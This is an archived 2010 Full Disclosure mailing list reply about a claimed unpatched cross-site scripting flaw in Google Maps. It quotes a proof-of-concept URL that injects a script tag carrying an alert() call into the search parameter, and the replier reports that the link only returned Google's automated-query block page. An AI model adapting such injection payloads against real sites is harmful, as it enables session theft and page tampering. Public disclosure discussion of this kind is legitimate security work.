Full Disclosure mailing list archives
Re: Google Maps XSS (currently unpatched)
From: Michael Lenz <shadow.stalker () gmx de>
Date: Tue, 12 Jan 2010 13:58:24 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Your PoC generates: " *Google* Sorry... We're sorry... ... but your computer or network may be sending automated queries. To protect our users, we can't process your request right now. See Google Help <http://www.google.com/support/bin/answer.py?answer=86640> for more information. © 2009 Google - Google Home <http://www.google.com>" So..? gaurav baruah schrieb:
Google Maps XSS (currently unpatched) Discovered By - Pratul Agrawal (pratul2u () gmail com) Gaurav Baruah (baruah.gaurav () gmail com) PoC -
http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
gaurav baruah schrieb:
Google Maps XSS (currently unpatched) Discovered By - Pratul Agrawal (pratul2u () gmail com) Gaurav Baruah (baruah.gaurav () gmail com) PoC -
http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAktMcfAACgkQ12k6J+72BxijGwCgvA7qEWtv8D9ImB9vGc8FBkZf xOUAnjUQ3dhG6bGwg690pqDXLyzeDQYC =GYKt -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Google Maps XSS (currently unpatched) gaurav baruah (Jan 12)
- Re: Google Maps XSS (currently unpatched) Michael Lenz (Jan 12)
- Re: Google Maps XSS (currently unpatched) Christian Sciberras (Jan 12)
- Re: Google Maps XSS (currently unpatched) NSO Research (Jan 12)
- Re: Google Maps XSS (currently unpatched) McGhee, Eddie (Jan 12)
- Re: Google Maps XSS (currently unpatched) zprian (Jan 12)
- Re: Google Maps XSS (currently unpatched) Juan Galiana (Jan 12)
- Re: Google Maps XSS (currently unpatched) Robin Sage (Jan 12)
- Re: Google Maps XSS (currently unpatched) dramacrat (Jan 12)
- Re: Google Maps XSS (currently unpatched) Rafal Los (Jan 13)
- <Possible follow-ups>
- Re: Google Maps XSS (currently unpatched) sunjester (Jan 12)
- Re: Google Maps XSS (currently unpatched) Valdis . Kletnieks (Jan 12)
(Thread continues...)
- Re: Google Maps XSS (currently unpatched) Michael Lenz (Jan 12)